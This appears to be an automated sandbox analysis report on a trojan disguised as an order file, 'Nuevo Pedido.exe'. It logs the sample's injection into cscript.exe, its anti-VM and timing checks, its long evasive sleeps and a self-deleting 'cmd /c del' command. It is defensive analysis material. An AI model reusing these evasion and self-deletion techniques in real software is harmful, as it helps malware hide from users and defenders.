            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9A50 NtCreateFile,LdrInitializeThunk,16_2_047B9A50
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9560 NtWriteFile,16_2_047B9560
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047BAD30 NtSetContextThread,16_2_047BAD30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9520 NtWaitForSingleObject,16_2_047B9520
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B95F0 NtQueryInformationFile,16_2_047B95F0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9670 NtQueryInformationProcess,16_2_047B9670
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9610 NtEnumerateValueKey,16_2_047B9610
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9770 NtSetInformationFile,16_2_047B9770
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047BA770 NtOpenThread,16_2_047BA770
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9760 NtOpenProcess,16_2_047B9760
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9730 NtQueryVirtualMemory,16_2_047B9730
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047BA710 NtOpenProcessToken,16_2_047BA710
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B97A0 NtUnmapViewOfSection,16_2_047B97A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047BB040 NtSuspendThread,16_2_047BB040
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9820 NtEnumerateKey,16_2_047B9820
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B98F0 NtReadVirtualMemory,16_2_047B98F0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B98A0 NtWriteVirtualMemory,16_2_047B98A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9950 NtQueueApcThread,16_2_047B9950
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B99D0 NtCreateProcessEx,16_2_047B99D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9A20 NtResumeThread,16_2_047B9A20
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9A10 NtQuerySection,16_2_047B9A10
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9A00 NtProtectVirtualMemory,16_2_047B9A00
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9A80 NtOpenDirectoryObject,16_2_047B9A80
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B9B00 NtSetValueKey,16_2_047B9B00
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047BA3B0 NtGetContextThread,16_2_047BA3B0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_006185E0 NtCreateFile,16_2_006185E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00618690 NtReadFile,16_2_00618690
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_00618710 NtClose,16_2_00618710
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_006187C0 NtAllocateVirtualMemory,16_2_006187C0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_006185DA NtCreateFile,16_2_006185DA
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061870C NtReadFile,NtClose,16_2_0061870C
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_006187BA NtAllocateVirtualMemory,16_2_006187BA
            Source: Nuevo Pedido.exeBinary or memory string: OriginalFilename vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000000.00000002.242885207.0000000005EF0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000000.00000002.243408230.0000000006390000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exeBinary or memory string: OriginalFilename vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exe, 00000003.00000002.309549800.0000000001C3F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exeBinary or memory string: OriginalFilenameMethodImplAttribut.exe. vs Nuevo Pedido.exe
            Source: Nuevo Pedido.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: Nuevo Pedido.exeVirustotal: Detection: 32%
            Source: Nuevo Pedido.exeReversingLabs: Detection: 33%
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeFile read: C:\Users\user\Desktop\Nuevo Pedido.exe:Zone.IdentifierJump to behavior
            Source: Nuevo Pedido.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Nuevo Pedido.exe "C:\Users\user\Desktop\Nuevo Pedido.exe"
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess created: C:\Users\user\Desktop\Nuevo Pedido.exe C:\Users\user\Desktop\Nuevo Pedido.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Nuevo Pedido.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess created: C:\Users\user\Desktop\Nuevo Pedido.exe C:\Users\user\Desktop\Nuevo Pedido.exeJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Nuevo Pedido.exe"Jump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Nuevo Pedido.exe.logJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@11/6
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6668:120:WilError_01
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
            Source: Nuevo Pedido.exeString found in binary or memory: /MethodImplAttribut;component/views/addbook.xaml
            Source: Nuevo Pedido.exeString found in binary or memory: views/addbook.baml
            Source: Nuevo Pedido.exeString found in binary or memory: /MethodImplAttribut;component/views/addcustomer.xaml
            Source: Nuevo Pedido.exeString found in binary or memory: views/addcustomer.baml
            Source: Nuevo Pedido.exeString found in binary or memory: /MethodImplAttribut;component/views/addbook.xaml
            Source: Nuevo Pedido.exeString found in binary or memory: views/addbook.baml
            Source: Nuevo Pedido.exeString found in binary or memory: /MethodImplAttribut;component/views/addcustomer.xaml
            Source: Nuevo Pedido.exeString found in binary or memory: views/addcustomer.baml
            Source: Nuevo Pedido.exeString found in binary or memory: a/MethodImplAttribut;component/views/addbook.xamlw/MethodImplAttribut;component/views/borrowfrombookview.xamlm/MethodImplAttribut;component/views/borrowingview.xamlg/MethodImplAttribut;component/views/changebook.xamlo/MethodImplAttribut;component/views/changecustomer.xamlk/MethodImplAttribut;component/views/customerview.xamlo/MethodImplAttribut;component/views/deletecustomer.xamle/MethodImplAttribut;component/views/errorview.xamli/MethodImplAttribut;component/views/smallextras.xamli/MethodImplAttribut;component/views/addcustomer.xaml
            Source: Nuevo Pedido.exeString found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Nuevo Pedido.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Nuevo Pedido.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp
            Source: Binary string: wntdll.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: Nuevo Pedido.exe, Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
            Source: Binary string: cscript.pdb source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: Nuevo Pedido.exe, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.2.Nuevo Pedido.exe.a80000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 0.0.Nuevo Pedido.exe.a80000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.0.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.5.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.2.Nuevo Pedido.exe.de0000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.2.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.3.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.7.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.1.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 3.0.Nuevo Pedido.exe.de0000.9.unpack, Biblan/Views/MainWindow.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_00A892F5 push ds; ret 0_2_00A89340
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_00A89361 push ds; retf 0_2_00A89364
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_00A89347 push ds; ret 0_2_00A8934C
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 0_2_056356E0 push esp; iretd 0_2_056356E9
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041B822 push eax; ret 3_2_0041B828
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041B82B push eax; ret 3_2_0041B892
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041B88C push eax; ret 3_2_0041B892
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_004153E6 push ss; iretd 3_2_004153EC
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041541E push ss; iretd 3_2_004153EC
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_0041B7D5 push eax; ret 3_2_0041B828
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00DE92F5 push ds; ret 3_2_00DE9340
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00DE9347 push ds; ret 3_2_00DE934C
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_00DE9361 push ds; retf 3_2_00DE9364
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_01A0D0D1 push ecx; ret 3_2_01A0D0E4
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047CD0D1 push ecx; ret 16_2_047CD0E4
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061B822 push eax; ret 16_2_0061B828
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061B82B push eax; ret 16_2_0061B892
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061B88C push eax; ret 16_2_0061B892
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_006153E6 push ss; iretd 16_2_006153EC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061541E push ss; iretd 16_2_006153EC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0061B7D5 push eax; ret 16_2_0061B828
            Source: initial sampleStatic PE information: section name: .text entropy: 7.85660170333

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Self deletion via cmd deleteShow sources
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del "C:\Users\user\Desktop\Nuevo Pedido.exe"
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: /c del "C:\Users\user\Desktop\Nuevo Pedido.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 0.2.Nuevo Pedido.exe.2dd8e9c.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Nuevo Pedido.exe.2e6b054.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Nuevo Pedido.exe PID: 6320, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000000608604 second address: 000000000060860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 000000000060899E second address: 00000000006089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -240000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6404Thread sleep count: 834 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6404Thread sleep count: 1723 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6324Thread sleep time: -32847s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239717s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239499s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239139s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -239015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238904s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238561s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238452s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -238046s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -237796s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -237437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -237250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -236890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6400Thread sleep time: -236781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe TID: 6348Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 6388Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exe TID: 4140Thread sleep time: -34000s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeCode function: 3_2_004088D0 rdtsc 3_2_004088D0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 240000Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239843Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239717Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239609Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239499Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239390Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239250Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239139Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 239015Jump to behavior
            Source: C:\Users\user\Desktop\Nuevo Pedido.exeThread delayed: delay time: 238904Jump to behavior
